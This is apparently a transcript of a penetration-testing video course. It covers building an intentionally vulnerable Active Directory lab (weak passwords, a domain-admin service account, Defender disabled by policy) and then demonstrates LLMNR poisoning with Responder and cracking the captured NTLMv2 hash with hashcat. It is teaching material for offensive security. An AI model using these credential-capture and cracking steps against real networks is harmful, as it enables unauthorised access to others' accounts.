will take a second and then once it loads it should populate your marble.local name here okay go ahead and select next okay now you're brought to this path screen and remember again the ntds comes up here and it says hey where do you want to select your database log files Etc remember we saw the ntds in the beginning just remember this again here you go for your database folder your log folders and then we'll talk about what the sysfall is a little bit later let's go ahead and hit next we'll hit next here again and this section may take a another second or two to load go ahead and pause if you need to okay now you will be brought to this screen that says install once you click install it's going to go ahead and install everything and then it's going to automatically reboot the machine when it's done so be prepared for that so go ahead and hit install and let your machine reboot if needed so now your machine should have rebooted and we can come in here and say control delete one more time now you see it says Marvel slash administrator before just set administrator now it says Marvel slash administrator that means we're logging into a domain of Marvel as the administrator so now your password that you've been using should still work go ahead and set that up log in and now you're logged in as the Marvel administrator of this domain there's a lot of fun stuff we could start doing with this but we're going to hold off until we actually get the other two machines set up that we need to so in the next video we're going to work on setting up those machines and then we're going to tie it all together and start building out our lab and all of our features that we need to actually start attacking it so I will catch you over in the next video all right now we have a domain controller we've got to have a couple of user machines so we're going to be setting up the same machine twice we're going to walk through one setup and then I'm gonna have you do this all over again and set it up a second time so we're going to need two machines for a couple of the different attacks that we're going to pull off in this lab however if you're running low on space and you just want to utilize one machine or you're running low on RAM that's perfectly acceptable you can just pay attention to the two machine attacks and just kind of take notes on those and know about them but you don't have to necessarily pull them off unless you want to so let's go ahead and do the same steps over we're going to go ahead and say create a new machine very similar to the last time and we're going to say browse and I'm just going to select this client Enterprise here the other ISO that we downloaded it says Windows 10 x64 detected good job go ahead and select next and then again with this you can just go ahead and say Windows 10 product key we're going to do pro on this or Enterprise actually Windows 10 Enterprise and the rest can stay blank and say next and yes same thing here before select your location if you need a different one I'm going to roll with the default and select next again 60 gigs split it up it won't take up that much space go ahead and select next and same as before do not power on this machine let's go ahead and hit finish this is going to create it and then we're going to go in there we're going to edit and remove that floppy just like we did before that way we don't have any kind of weird boot issues now the Windows 10 is going to take a little bit longer to install than the actual domain controller or the server did so let's go ahead now and select edit this virtual machine settings down here remove this floppy drive like before leave your connection as Nat just like we did before and two gigs of memory should be fine go ahead and hit OK and then we're going to go ahead and play this virtual machine same thing as before get your trigger fingers ready press any key and there you go it should start booting up into our Windows menu and this will just take a second for it to load up okay so we're brought to this screen let's go ahead and just select next with all defaults and then install now this should just take a few seconds again if you need to pause and continue that's absolutely fine let's go ahead and say I accept the terms next custom install just like before and we're going to say new just like before apply okay and we'll set up just like it did previously hit next and then just like before here let's go ahead and let this do its install thing go ahead hit pause and then come back once you're completely installed with all of your features this will take just a little bit all right once everything has installed these should be brought to this region screen let's go ahead and just select next I'm in the United States I'm going to say yes on the United States and it's going to say just a moment and which keyboard layout do you want go ahead and select your keyboard layout mine's a US based do you want to add a second keyboard I'm going to say skip and now it's going to do more setups so go ahead and pause the video and come back when these setups are complete now you're brought to the screen to sign in with Microsoft account you don't have to do that go ahead and select domain join instead down here and then it says who's going to be using this PC let's go ahead and just give it a name so for this one I'm going to say Frank Castle so we'll do something like that and hit next and what's Frank's password gonna be my password is going to be password one with a capital P terrible password but Frank he doesn't use the best passwords and again let's go ahead and just say password one next and it's going to ask for security questions so go ahead what's your pet's name I'm just gonna say Bob and we'll go ahead and have different different ones in here what city were you born in Bob and security question three childhood nickname you guessed it it's Bob go ahead and hit next and then do you want to access more devices say no decline and then in here I like to turn everything off so turn all this stuff off and then let's go ahead and just hit accept and now you're gonna get this wonderful screen which you may have seen before it's gonna say we're getting everything ready for you so go ahead and pause one more time and then come back once your screen's all ready to go okay now your screen should load to something similar to this again we've got this funky small screen so let's go up to player manage and install VMware tools and it's going to be the same process as before we should get a little pop-up here in the corner in just a second we're going to install that should bring things to full screen go ahead and click on this run this setup and select yes and what we're going to do is we're going to install this get this full screen and once we've got this on complete here next install I'm going to let this run through and I'm going to talk about kind of what the next steps are and then we're going to repeat all this process one more time I'm actually going to have you do it on your own so from here what we're going to do is we're going to let this install we're going to do a name change of the computer and then we're going to reboot after that what we're going to do is we're going to hit the pause button get our second machine installed set up our active directory in another video and then come back and join both of these machines to The Domain and then we should be good to start attacking them so let's go ahead and hit finish and then what I'm going to do is I'm going to say no again here let's see if it actually made it full screen it did and then we're going to come here and we're just going to go in and we're going to say computer name just says before view your PC name and scroll down rename this PC so for me I am a Marvel fan and this computer belongs to Frank Castle who is the Punisher so I'm gonna name this The Punisher something like that you can name it whatever you want I'm gonna go ahead and hit next and then this should say okay good to go and then it's going to ask us to reboot we'll reboot have the new machine name and should be good to go so let your machine reboot with your new name then go ahead and repeat this process all over again have a second machine running pick whatever machine name you want for it and get both of those machines to the same state from here we're going to go ahead and set up our settings then we'll join all of our machines to The Domain and be ready to attack so I will see you in the next video okay now let's configure our domain controller and we're going to configure some policies create some users and just take a general look at active directory so on your domain controller go ahead and log in remember here that this is the funky password that we set up with the capital P at dollar dollar lowercase w zero Rd exclamation this should be your administrator password so from here we are brought again to This Server manager dashboard now let's go ahead and click on tools up here and we're going to select active directory users and computers so go ahead and select that and if we click into this marvel.local here you can see we have a few different OU's these are organizational units now we've got built in we've got a bunch of built-in security groups here we have computers if any computers are joined to The Domain they will show up here we've got our domain controllers which is hydra-gc and we've got other things here we've got manage accounts which you don't have any foreign security principles don't have any of those and then users so we've got security groups in here I like to just create a new group and we can just like right click in here and say new and then say group or organizational unit actually and then we can just say groups something like this say okay and then I like to take all these groups out of the users accounts and then kind of just drag them over and say yes that's fine copy these drag these over say yes that's fine and now we've got it nice and cleaned out for our users area now note this little down arrow next to guest if you see a down arrow on account that means that the account has been disabled so from here we have our administrator user we could double click on that we can provide all kinds of little properties descriptions Etc we can pick what groups this person is a member of so you could see that the administrator is a member of domain admins which means that they are an administrator Enterprise admins as well schema admins and domain users so if you're a domain user that means you are able to log into the domain so we're going to create a couple domain users and we'll create another domain admin as well or two and just give an idea for what these accounts are going to look like so first let's go ahead and just right click and we're going to say new and then we're going to say user and I'm going to go ahead first and create Frank Castle so I'm just going to say Frank Castle and then you're going to want to pick your naming convention here so I'm just going to say f castle like this first initial last name go ahead and hit next and then here you're going to pick a password I'm going to give him password one again just like I did before and then I'm going to say the password never expires this is bad I'm not going to have them change the next login I'm not going to say the user can change the password should just be like that finish and there you go okay so let's create another user I'm going to right click on administrator and I'm just going to say copy and here I'm copying a domain admin and so what's going to happen let's create another user we'll say Tony Stark Tony Stark is going to be our domain admin we'll say t-stark hit enter for next and we can give him a more complex password if you want so I'm going to give him something like password 2019 exclamation at symbol pound sign It's Not Great by any means but it's a little bit better and then we'll just say password never expires next finish okay let's create two more users so let's create this user here and we're going to right click on Frank Castle we'll say copy and on this one we're going to give we'll say Spider-Man we'll say Peter Parker and p Parker here okay and then we can have a different password for Peter we can just say something like password two and then password to again okay password never expires good next finish and just to show you what's going on so let's click into Peter Parker you can see Peter Parker's just a member of domain users because we copy that property from Frank Castle now if we looked at Tony Stark you could see that Tony Stark is a member of all the same groups as this administrator because we copied that from the administrator so Tony Stark is a domain administrator which is exactly what we want right now so we're going to create one more user let's go ahead and create a fake SQL account so we're going to right click and we're going to copy Tony Stark and we're going to do a No-No we're going to make this SQL service account a domain administrator now you're service accounts should not be domain administrator accounts but I would say probably seventy percent of the time that I'm doing a pen test the service accounts are domain administrators and I'll show you why here in just a few videos why it's bad and what we can do to attack those service accounts that are domain administrators so from here let's just call the SQL service something like this and we'll just call this SQL service just like that okay and we'll hit next and then on this we're going to give it a password I'm going to give it a password of something like my password and we'll just call it one two three pound my password actually I'm messing this up so I'm going to give you the syntax capital m capital Y lowercase password one two three pound capital m y lowercase password one two three pound go ahead hit next and finish that so if you needed that one more time I'll open up a notepad and that is my password one two three pound all right now I'm going to open up the SQL service user and in the description let's say that I forgot the password or I'm just gonna say password is and then we'll just say something like my password one two three pound now you'll see why this is bad later on but a lot of domain administrators like to put passwords of their service accounts in the description because they think that they are the only ones that can read them not true we'll see how we can read this later on but for now we'll just say password is my password one two three pound and we've got a few users in here and we've kind of got this set up so this is good to go let's go ahead and do a couple more things so let's go ahead and set up a file share so click on this down here and if I clicked on that too fast file and storage Services Under server manager and then we're going to click on shares right here and then there's a task up here at the top go ahead and just say new share and we'll just select SMB share quick share location is hydro DC that's fine C drive and we'll just say the share name is going to be hack me something like that okay hit next we're just going to use all defaults create and close so now we have this C shares hack me share why did I just do that because most domain controllers have file shares and we've talked about this before but we wanted to open up 139 and 445 so that we have SMB enabled on this domain controller so if we were to scan against it we would see that there is 139 445 and we can leverage some attacks against this and we're going to enable that on our machines as well when we're searching or having file shares on our on our personal user computers as well so for now this is good and we're going to do a couple more things so let's go ahead and let's open up a command prompt so go ahead and just type in command and run that as an administrator and we're going to create what is called an SPN a service principal name and don't worry too much about what we're doing right now we're going to talk about this way more when it comes time and we're going to talk about the attack related to this we're setting up an attack for Kerber roasting and that is an attack that attacks Services okay so we set up the SQL service we're going to attack the SQL service but we have to set up a service principle name which we'll cover a bit later on in the course so first let's go ahead and get that set up so we're going to say set SPN and then we're going to do a dash a and we're going to say Hydra DC or whatever you named your domain controller and then we're going to say SQL service whatever you named your SQL Server should be the same as mine dot Marvel dot local like this and then we'll pick a port I'm picking six zero one one one and then we're going to say Marvel like this and then we'll say SQL service so again set SPN a hydra-gc which is the computer name sqlservice.marvel.local Port of 6011 and the Marvel SQL service hit enter and then it's going to say checking it registering it and updated that object perfect now let's make sure that it is set so we're going to say set SPN Dash capital T and we're going to say Marvel dot local like this Dash Q and then a wild card forward slash Wild Card hit enter and down at the bottom you can see that the SQL service has been set Hydra DC sqlservice.marvel.local 60111 perfect okay so now we have set up our users we have set up our kerberosing attack we have set up our SMB shares there's one last thing we need to do let's close that let's come into here and let's start typing in group policy so we got group policy management here right click and run as administrator and you can see that we've got the forest here of marvel.local go ahead and drill down into domains and you see marvel.local here I'm going to go ahead and right click and say create a GPO in this domain and Link it here and this GPO is going to be called disable Windows Defender all right now hit enter and I realize that some of you are going to be wondering why we're disabling Windows Defender so let's talk about this there are many courses out there that show you anti-virus evasion and bypassing and I think it's great and it is important to know those topics the reason why we're not going into that in this course is because it changes so significantly so quickly a lot of these attacks are still going to work regardless of the anti-virus that you have most of these attacks are going to work so what is important is to know the fundamentals of the attacks if I show you AV evasion today within two to three months it's going to be Obsolete and I hate to have that in a course and then have people get upset or frustrated that it's getting detected because it's always changing so I'd rather show you the foundations and the fundamentals and then let you learn the AV bypassing as the techniques come up as the time changes remember being a good penetration tester is about sticking with the times and staying up to date as long as you're staying up to date you're going to be fine knowing the foundations and the basics are way more important at this stage than any AV evasion or crazy fun technique like that so please bear with me we're going to get through this and we're going to disable Defender we're going to work on all these attacks learn the basics and then you can improve upon that from there so go ahead and right click on this disable Windows Defender here and select edit and then we're going to navigate in this computer configuration right here we're going to click on computer configuration and we're going to go into policies and we're going to go into administrative templates and we're going to select Windows components down here and then if you scroll all the way down there's going to be a Windows Defender and we've got Windows Defender right here on antivirus and we're going to click on that and then we're going to turn off Windows Defender antivirus double click and it we're just going to select enabled here okay and then we are going to apply and select ok now let's also go into Windows Defender exploitgard and see if there's any protections that we need there's not Defender smart screen no detections that we need either so as of right now we are good we've got Defender turned off we have the policy enabled so once we actually join our domain PCS to The Domain we will have no Windows Defender enabled on them which is perfect that's how we want to attack this so now let's go ahead and close this okay let's pause the video real quick because there's one more thing I need to tell you is that if you see here where it says enforced it says no we need to make sure that it says yes so go ahead and right click and then click on enforced and then it should say yes and then you are now good to go and we have successfully configured this part of our course what we're going to do next is we're going to finish setting up our PCS our user PCS we're going to join them to the domain and we're going to enable some file shares on those and then we'll be ready to start attacking those so I'm very very excited once this lab is built we're going to be ready to roll so I'll see you over in the next video When We join our PCS to The Domain all right so I'm going to run a setup for one machine I want you to do it for the one machine and then I want you to go ahead and do your second machine the exact same way if you're running the two machine configuration so I'm on the Windows 10 Enterprise this is Frank Castle's machine The Punisher and we're going to go ahead and join this to The Domain so before we do that I do want to go ahead and go to our PC so go to this PC go to your C drive and then go ahead and just right click new folder and we're just going to call this share and we're going to make a fake share here well it's going to be a real share but we're not going to really use it and we're just going to right click on it we're going to select properties and then we're going to go to sharing we're going to say share right here and then we're going to share everything and then say yes turn on network discovery and file sharing for all public networks and done and now we are sharing on this machine so we can go ahead and close that out now on top of this we're going to go ahead and join this to the domain so let's go ahead and first go to our domain controller and let's grab our IP address let's go do a command prompt here and we're just going to say ipconfig and our IP address is 192.168-57140. so 57.140 I'm going to go ahead and switch back to this machine and now let's right click on this access down here on the internet access and say open network and internet settings down here you should see change adapter options go ahead and select that and then we have ethernet 0 right here go ahead and right click this and select properties and then we're going to go ahead and double click on this ipv4 and it should bring up a screen that looks like this we're going to leave obtain an IP address automatically this is DHCP that's absolutely okay here on the DNS we're going to do something like this we're going to say 192. if I can type 192 168 57.140. so we want the IP address of the domain controller here because we need to get DNS from that go ahead and say okay and then we're going to go over here and we're going to say domain and it should say access work or school go ahead and select that and we're going to say connect and then it's going to bring this up set up a work or school account down here say join this device to a local active directory domain and now it's going to say domain name what are we going to join well we're joining Marvel dot local okay now it's going to say who do you want to join as well let's go ahead and just say administrator and then we're going to go ahead and say our password which we set way back in the beginning and now we are good to go we're going to skip this feature here and then we need to restart so let's go ahead and restart now and so this is going to reboot when it reboots you're going to need to log in as your user so how I've set up this domain is this user is going to be Frank Castle so F Castle is going to log into the Punisher the other user you saw me create was Peter Parker or p Parker and I am making a machine called Spider-Man so we're going to be able to have Spider-Man and we're gonna have the Punisher as two machines so I'm going to go ahead and log into this now instead of being Frank Castle this is a local account we're going to go ahead and do F castle like this and we're going to say password one which is what we used before log in here and it should log Us in as this user now it might take a second to get everything ready and there's going to be one other setting that we're going to do on this computer specifically and then there's going to be one setting on the other machine that we're going to want to do as well so I'm going to go ahead and hit the breaks here and we're going to let this finish and once it finishes we're going to go ahead actually here it is so let's go ahead and make these setting changes real quick now you can see that we are actually logged in as fcastle we've successfully done that great so let's go ahead now and let's sign out and let's sign in as the administrator because I do want to make a couple changes here so let's go ahead and say administrator and let's go ahead and we'll do we got to do Marvel slash administrator like that and we'll do password as we set it log into this computer and it might take a second again what we're going to do is we're going to enable Frank Castle to be a local administrator on this machine so we want to set that up and then we're going to go ahead and we're going to navigate over to Spider-Man's machine and we're going to set Frank Castle to be a local administrator there there is a special attack that we want to do actually two special attacks we want to do that involve the usage of local administrators on multiple machines so let's go ahead and come into here and we're going to go into right click or actually we can do we could do right click and computer management and this should bring up our settings for local administrators okay and then we come local users and groups in here we've got groups go ahead and double click administrators and then we're going to go ahead and add a couple users so we're going to add well we'll just add F capsule on this so check names f-c Castle is good and then we're going to apply and say okay and we're good here so let's go ahead and stop here we'll go ahead and get your other machine set up completely as you need to log in as the administrator on your other machine and meet me over there we're going to set up Frank Castle and Peter Parker as administrators there as well okay now on to Peter Parker's machine same deal here so if we go into administrators I've made Peter Parker an administrator of his own machine and I've also made Frank Castle an administrator of Peter Parker's machine so however you set this up make sure that you have a user that is on domain admin or an admin I should say on two machines local administrator on two machines and you have a user who is a administrator on their machine on both so Frank's administrator Zone machine Peterson administrator in his own machine and then Frank has administrator access on both machines all right and also make sure you set up everything the same this also has a share in it has the share here and we're domain joined last thing I want to point out so let's go over to Windows server and I'm going to log back in and then let's take a look at what our active directory looks like now so we come into here and let's go ahead and go into our users and groups and let's look at our computers here we might have to refresh up top and then you can see now Spider-Man and The Punisher have been joined to this domain they showed up in our OU here and we know that we have successfully joined the domain everything is set up the way we want it to be now we can move on to the attacking phase where we start attacking all these things and notice we only made a few changes right we did turn off Windows Defender but for the most part we've got normal default settings for pretty much everything we added some file shares to just emulate a network and we set up a service that's pretty common as well so so far besides turning off the fender everything is pretty common across the board for how you would see an active directory network setup so from here we're going to exploit these these settings these almost default configurations and really just own this network all over the place so let's see how we can do that and I'll catch you over in the attack vectors video we are finally here this is my favorite section of the course and now we're gonna start actually attacking we've got our lab built out and we're ready to roll so this first section I'm calling the initial attack vectors and what I mean by that is this is the way we're going to initially attempt to attack active directory there are a lot of post compromise attacks which you're going to see a little bit later that require having some sort of credential or some sort of lateral movement already occurring so first we have to find a way into the network when we start a penetration test especially internal we just have a machine we have our machine and we drop it into the network typically your remote you just RDP into this machine or maybe you're on site and you're working in front of this computer but you're just dropped into a network you are given no credentials you're given nothing okay and what we're going to do is we're going to go through how we can abuse features of Windows features again these are not misconfigurations just features of Windows and utilize those to get access to user accounts credentials and get access to machines as well so it's going to be a really really fun ride now when I first started getting into active directory pen testing my very first pen test I had no idea what was going on and I was just kind of thrown into it they said here you go go figure it out so I was on site and I had my my laptop and Google and that's that's it right and I found this wonderful article and I'm going to show it to you as well and this is kind of what started me out now it doesn't really have the how to do it but it just kind of has the here's what I do and this is the 2018 Edition so it's a little dated but most of these attacks are still very very common and what we're going to be covering in a lot of these are we're going to be covering all these tacks first of all and a lot of these are those initial attack vectors so this is the top five ways I got domain admin on your internal Network before lunch I'm going to post this link down below uh in the references and so this Adam gentleman here he talks about net bios and LMR poisoning this is going to be our first topic that we're going to cover we come through here relay attacks that's going to be the second topic that we cover and we keep going through let's see what else he's got ms17010 that is eternal blue right and we covered that in the mid-course Capstone this you saw how easy it was in the mid-course Capstone this is truly that easy it is literally just discover the host running the vulnerable uh SMB right and then you exploit it very very simple just like we did it before you get that shell pretty easy you would not believe it's been almost three years now how often we still see ms17010 in a network it's all the time okay and then we're going to cover Kerber roasting later on when we get into post compromise attacks and man the middle six we're actually going to be covering as well in this first part of the uh initial attack vectors these are all very very good ones they still hold up to date very well um some of these are starting to be defended against and we'll talk about that as we go but when it comes to having a good reference point and a good starting point to learn attacks if you knew these five going into an interview you would have a leg up over just a general candidate so that's what we're after here is the practicality of this course and being practical with our attacks understanding the attacks and the defenses and getting you ready for that that pen test interview so let's go ahead and move on from here we're going to get into our first attack which is going to be l m r poisoning so I'll catch you in the next video okay let's talk about our first attack so this is called lmnr poisoning now what is lmnr so lmnr is what is known as link local multicast name resolution and when you say that all we have to do think about it is it's basically DNS so it's used to identify hosts when DNS fails to do so and this was previously known as mbtns which was net bios name service and the key flaw here is that when we respond to this service it actually responds back to us with a username and a password hash and it's really bad okay so we're going to take a quick overview and look at what it looks like we're going to see how the attack is ran and talk through some of the strategies and then we're going to go ahead and actually do a live demo in the next video so you can follow along so let's take a look first at an overview so let's say we have a victim up here in the corner you see the victim machine and it reaches out to the server and it says Hey I want to connect to this hackm server well really the server name was hack me but the user just happened to type in something wrong which is causing a DNS issue and that DNS issue goes out we can't resolve with DNS and the server says hey I have no idea really what you're talking about here and so we go out and we say hey broadcast message I'm going to send this out to everybody does anybody know what this hack m is or where I can go to connect to it and US listening in the middle this is a man in the middle attack we're gonna say hey I know exactly where that computer is we're lying and we're going to say just send me over your hash and I'm going to get you connected and the victim's just going to say here you go here's my hash so that's really what lmnr poisoning is we're sitting in the middle listening for these requests and when the request happens we're just waiting to get a response to us so we're going to run a tool called responder and we'll talk about that here in a second so responder is part of the impacket toolkit now we ran impact it with several things in this course already we installed it way earlier and we even used it in some of the Box walkthroughs when we use the SMB client and the PS exec and the wmi exec that's all part of impact it and we're going to be using impact it for some other attacks as well as we go through some of these common active directory attacks so we're going to run a tool called responder it does exactly what we just described it responds to these requests and we just run this tool and we load it up and we're just sitting there and we're listening now my strategy is that I run this tool first thing in the morning so if my assessment starts at eight o'clock I'm running this first thing the best time to run this is first thing in the morning or right after lunch because people are coming back from lunch and you need a lot of traffic so I will actually start this up before I start up any nmap scans any Nessa scans anything at all this is one of the first things that goes up why do I do that because the nmap scan or the NASA scan is going to generate some traffic as well and then it might actually get some traffic talking back to you from other machines so we're just waiting for those responses and trying to capture hashes so let's say here that we run responder and then with running responder an event occurs now here all I'm doing is I am pointing this at our attacker machine IP address you don't have to worry about that too much but just think of this as somebody typed in the wrong network drive and this is just one example by the way a wrong network drive is just something failing to do DNS right so we're trying to access this network drive can access we're just sitting here listening in the middle for the ease of the demo we're going to point this out ourselves but that does not always have to be true once that happens an event occurs okay the event occurs and it says listening for events Look what comes through we get here a ntlmv to Hash right here and we get the IP address of who we captured and the user who we captured so you see here Marvel slash F Castle this is our Frank Castle user and this is their password hash now there's a lot of things that we can do with this hash and we're going to run a couple different attacks with it but the first attack we're going to talk about is just taking this hash and trying to crack it so we're going to take this hash and we're going to run it through a tool called hashcat and you can see here that we actually crack the password to be password one which is what we said it when we first set up the lab so that's really it all we're doing here is we're listening in the man of the middle situation and this is very very common so what happens here is if passwords are weak and guessable then we're going to be able to crack these passwords with any sort of decent password cracking rig and for example I'm using a 2080 TI which is pretty latest and greatest pretty powerful right now there are some rigs out there that will stack like four to six of these 2080 TI's or even better but you don't necessarily need that when I was first starting out I was using a 970 graphics card and it was doing just fine for cracking the better the graphics card the better your cracking speed will be but you don't have to have the latest and greatest to perform a lot of these tasks right now and chances are when you go work for somebody they're going to have a cracking rig anyway so not something you have to worry about too too much but to understand this attack the less complex the password the better off we are because we're going to be able to crack these passwords and then once we have a cracked password account there's a lot of cool things that we can do to leverage that to actually get on to a machine so we're going to cover that as well as we get into this and get deeper as to what can we do to get access once we have a password and how can we leverage that so from here just your big takeaway is we're doing man in the middle listening we're listening for any sort of event where we can take over in place of DNS and we're going to respond to these with the tool called responder we're going to pull down these hashes take them offline and try to crack them if the passwords are weak or and when I say week I mean like less than 14 characters the longest password that I've ever cracked is 19 characters and that was a Bible verse so I always tell clients that just because your password is long does not mean that it is good your password should be non-common words or long sentences or something greater than 14 characters but also complex so the longer and the more complex the better but honestly I will take a 40 character sentence without any complexity at all over a 14 character password that has some complexity capital letter exclamation point Etc because we can still crack these and you're going to see that later on us cracking a pretty lengthy password but still a guessable password so that's the takeaways from this let's go ahead and move on to the next video when we're going to actually talk about performing this we're going to perform this live and see how to do it and then we'll talk about defenses as well so let's go ahead and jump over there all right so now we're going to utilize responder and we're going to pull down this hash so you should already have the impact toolkit installed if you don't there are multiple videos here so please be watching the videos all the way through don't skip ahead or go out and Google impact it GitHub and install it that way so from here let's go ahead and type in responder and you should be able to auto complete all we're going to type in now is a dash capital i and this is our interface our interface here is going to be ethernet 0 and I will go ahead and just open up a new tab because we're going to need that and let's go ahead and just type in ifconfig or IPA and you can see here that we have our IP address and it's on ethernet zero so that's what we're going to be listening on the inner ethernet 0 interface and then the rest that we're going to need is just a dash RDW so you don't have to worry too much about what this is this is just saying these are the different types of what we're gonna be listening on uh one of them is wpad you can look at the dash dash help for this but this is the most common settings and if you want to see a hash again more than once go ahead and just do a dash V so since we're not saving this output right now I just do a dash V for verbose this is an optional setting once you're actually working in the field but just for now just in case you capture the hash and you want to see it again this is a good way otherwise it stores in the pop file for later on let's go ahead and just do a dash RDW like this you can see okay it says hey you're listening on ethernet zero here's your IP address and when you scroll up here are your poisoners okay lmnr and then when llmnr fails it actually goes down and works on mbtns so it goes DNS lmnr mbtns it's also listening on DNS and it's doing a few different things here it's running a few different servers and all we're doing is running those servers in the middle just to see if we can get a connection from any of these and try to intercept and respond back so you see here now it says it's listening for events so go ahead and go over to your Windows machine and you can see that I've actually put my windows machines just as a lab setting this is kind of what's nice about having the actual pro version is you can just keep all of your windows machines in one area so I've got my Windows machine spun up I've got Windows Server 2016 and I've got the windows 10 Frank Castle machine spun up so the Punisher and the Windows server and what we're going to do is we're just going to open up a file share like this or a folder and I'm just going to point this right at our attacker machine so mine was 192. 16857139 I do believe so let's go ahead and double check that 57139 okay and then all I'm going to do here is hit enter and it shouldn't resolve right this should this should wig out nothing should happen here and you see it's trying to enter your network credentials access is denied we actually do have a server up and running an SMB server and look what's happened here but like we do have we do have the SMB server up and running so it's trying to connect to that but you can see that it has pulled down the hash and it pulled it down twice which is fine but it's pulled down the IP address of the machine we're attacking the user and the user domain and then hash right here so everything that we talked about in the last one this is exactly what happens so let's go ahead and recap this and I'm going to blow this up so you're on your first assessment you're sitting on an internal and first thing you want to do at least in my my playbook one of the first things I'm doing I'm running responder now it just depends how loud we're going to be I'm going to show you some other things but this is especially if the client has never had a pen test before this is always a good go-to now clients are getting smarter about this attack and technique and we'll talk about that in the actual defense video for this but clients are getting smarter about this and they're starting to turn this off but for now I would say 70 of the clients that I test against are still running LMR in their networks and this is allowing for easy wins especially if they have a poor password policy which a lot of clients will so this is a great initial attack Vector to capture some hashes and we'll capture these hashes take it offline try to crack it it's amazing we can do a lot with this so from here we're going to go ahead and install hashcap or use hashcad on our machine I'll show you a couple different methods of how we do it then we'll talk about the fences and move on to the next attack so let's go ahead and move on to the next video I'll see you over there when we work on cracking this hash all right picking up where we left off we're going to utilize a tool called hashcad now hashcat is built into your Kali Linux machine though we're going to talk pros and cons of that here in just a second hashcat is a tool utilized to crack hashes and we're going to run it first on our Linux machine and our VM and then we're going to try running it elsewhere and just take a look at speed differences so what I want you to do is actually cap capture this whole hash here we're going to copy it and we'll just do something like G edit ntlm hash dot text it's fine and we'll paste that bad boy into here and just hit save now we're going to need to set up our hash cat so our hash cat is going to look something like this so it's going to say hash cat and then we're going to have to do a module of 5600 just type this in with me I'm going to go ahead and show you what it means in just a second then we need our file that we're going to attempt to crack which is going to be ntlm hash.tax and then we're going to need a word list so we don't have the word list yet I'm going to show you where you can find that so first things first what the heck is this m5600 so if we go to a new tab and we just say hashcat dash dash help well it tells us a bunch of different ways that we can attack hashes here and there's all different kinds of settings when it comes to hatch cat but what we're after is a module right and look at all these different hashes we can crack now some of these might sound familiar like md5 shot one Etc but you know this is a long list of modules and here are all the different numbers that we have to go through and we have to look through these to find what we're after so here's net ntlmv2 which is 5600 now we could do a little bit of Linux Foo here and just you know narrow this down so we can say tab up hash cat dash dash help and then what if we just say graph and we know the hash is ntlm like that guess what we just pulled down four ntlms and we can just pull the 5600 right out of here in case you ever forget I have it memorized so they do it so often you probably will as well also you can put this into your notebook and this will be a good place to have it and just say hey how do I crack until mv2 hashes here you go or have a hash cat cheat sheet there you go as well make your notes your own but of course as I've said this whole course please have notes so we've got our module we've got our hash now we need to crack that hash so we need a word list to do it let's go up to files I'm going to show you a little little area in our in our computer here so go ahead and go to other locations and we're going to do a computer and then we're going to go ahead and we're going to go to user and then share right here and start typing in word list and that will bring you right to word list here now there is this rockyou.txt.gzip go ahead and open that and once you open that just go ahead and say extract and we could put this into word list that's fine or we could put this let's put this uh let's put this in our home folder that'll work because we might use it again so let's go ahead and just extract this and it might take a second here now we're not going to open this up but Rock You is 140 megabytes and I can't tell you how many passwords are in here Millions there's millions and millions of passwords in the Rock UDOT text file this is just the default word list that comes with this there are lots of word lists out there that you can choose from for example we could go out to we got the Firefox just go to Google and there are several different sites we could say google.com and we could say um hash cat wordless and we can look for the and there's different ones password passphrase word list here there's another one called um secless so we say password seclist like that and there's this great GitHub here for secless and you can come through here and they have all different kinds so we can go through them usernames Discovery passwords right here and they've got the top 100 top 10 000 uh all the way through 10 million passwords right so um the word list that I use is like 70 trillion or something insane and it takes about 15 minutes to go through so that's how fast a processor can work but you just kind of have to find your own uh look through them out there and it's probable that your company will have their own word list as well but when you're doing stuff like hack the box or you're just doing capture the flags usually something like rock you is plenty sufficient you don't need to go above and beyond that once you start getting in a cracking user passwords then you should start looking for a better word list but for now we're going to go ahead and just say rockyou.text since we put it into our home folder and now we have to also add in this dash dash Force now for me this is probably not going to work it's been a little bit since I've actually checked this I have a pretty new processor I'm running either a late i7 to an I9 and what this is doing here is it's going to try to run it but even still we're in a VM and the dash dash force is saying hey I know I'm in a VM this is not going to run off my graphics card this is actually going to run off my CPU it's going to be a lot slower and we're going to try to force this to run off the CPU I'm going to hit enter you may work mine will not work okay this is what mine looks like so because I'm in a VM it's still not going to work for me you might get a little bit uh better luck and it might work for you so here is the alternative you should always run your password cracking regardless of what tool it is but let's say hashcat you should always run it on whatever system you're running your base operating system for example I'm running on windows so guess what we can do we can go out to Google we could say hash cat download and will be brought right to hashcad.net here come to here and right here is the hashcap binaries so we can just download the binaries right here and I'll just go ahead and open this this is a 7-Zip file and this is hashcat 5.1 I'll bring this over you can see we just extract this and then we have our 64 exe right here and we can run the same kind of deal so go ahead and extract this and I'm going to show you how to run this what you're going to want to do is you're going to want to have your word list so if you need to go ahead and go into your files you should be able to copy and move over so copy your rocky.text onto your desktop or wherever you're going to be putting this I put this right into a folder on my desktop and I'll show you my actual cracking one so mine looks like this where I've got it 4.2.1 I'm a little outdated but I just have my hash cat in here and then I put my different hashes in here that I try to crack and I have rocky sitting right here as well so you could put it right in the same folder it'll make it easier and then we'll go ahead and just attempt to crack these passwords right so I'm going to make a new text file here and I'm just going to call it hashes hashes dot text or hashes4.text is what this one will be so I'm going to go ahead and just copy this hashes over here put it in a file and I'll show you what it's going to look like so should be exactly the same so I have a text file hashes floor dot text and go ahead and see I might have to minimize this for us okay hashes.txt looks just like this I'll go ahead and save this or hashes4.text and then I'm going to need to bring up a command prompt for you run it as administrator and I'll bring this over and I'm just going to go right into the folder I have it stored so C users Heath desktop hash cat and from here the syntax is really the same the only thing I'm going to change is just a little bit of the file format for the executable so it's just hashcat 64.exe the M of 5600 is still the same and then we're going to say hashes4.txt and then rock you dot text and then I'm just going to do a dash o this stands for optimize so I just want to optimize the output here and it's going to make this go a little bit faster but just best practice to use Dash o here okay and let's go ahead and just hit enter on this and this will take just a second to spin up and then you're going to notice as soon as it spins up see I can't even finish my sentence that's how fast it is as soon as it spins up it finds the password hash and it cracks it so you can see password one here and this is exactly what we set the password to so again this is a weak password very easy to figure out and when you run into organizations like this you're going to see this all over the place and I still estimate like 70 percent of the clients that I'm I'm going up against are are using lmnr mbtns and they're using weak passwords so these are just really easy wins when it comes to you know movement in the network and getting that initial foothold this is why LM and R poisoning is such a big one such a common popular one to be used so again this comes down to password policy and having a good password policy it we're going to crack these these small small passwords we're going to crack passwords that have common characters and we'll talk about this in defenses but we really just want to let the client know you know like this is a good indicator to let them know like we we capture these hashes and we crack them or capture these hashes so we didn't and that's a good indicator of their policy and other things to check too if you're rock you or whatever word list that you're using doesn't work 